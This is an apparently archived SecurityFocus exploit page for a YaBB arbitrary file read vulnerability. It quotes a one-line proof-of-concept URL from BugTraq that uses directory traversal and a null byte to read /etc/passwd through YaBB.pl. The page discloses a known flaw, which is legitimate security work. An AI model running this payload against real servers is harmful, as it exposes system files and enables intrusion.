info
discussion
exploit
solution
references
YaBB Arbitrary File Read Vulnerability
From the BugTraq message:
http://www.my_target.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
Privacy Statement
Copyright 2010, SecurityFocus
